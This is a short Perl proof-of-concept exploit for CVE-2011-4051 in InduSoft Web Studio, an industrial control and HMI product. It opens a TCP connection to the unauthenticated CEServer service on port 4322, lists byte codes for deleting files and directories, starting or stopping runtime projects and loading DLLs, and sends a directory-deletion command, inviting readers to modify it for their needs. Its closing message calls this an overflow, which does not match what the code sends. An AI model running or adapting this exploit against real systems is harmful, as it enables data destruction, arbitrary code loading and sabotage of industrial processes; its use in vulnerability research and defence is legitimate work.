#PoC for CVE-2011-4051
#CEServer Module in InduSoft Web Studio 6.1 and 7.0 allows unauthenticated user to run commands.
#These are ; remove file/directory - send/update file - start/stop runtime project
#and Load DLL into WebStudio process.
#Modify the script to suit your needs.
#Vulnerability discovered by Luigi Auriemma
#http://zerodayinitiative.com/advisories/ZDI-11-330/
#Celil Ünüver
#www.signalsec.com

use IO::Socket;
 
$host = "192.168.138.128";
$port = 4322;

 
$sock = IO::Socket::INET->new(   PeerAddr => $host,
                                     PeerPort => $port,
                                     Proto    => 'tcp') || "Unable to create socket";

$start = "\x07";

$rmvfile = "\x15";

$rmvdir = "\x10";

$dlltag = "\x31";

$sendfile ="\x04";

#0x10 remove directory
#0x15 remove file
#0x01 update a file
#0x08 stop softplc runtime project
#0x07 start softplc runtime project
#0x31 run/load DLL

$data = "C:\\Python24";

$removedir = $rmvdir.$data;

print $sock $removedir; 
print "\nOverflow request sent....";

close($sock);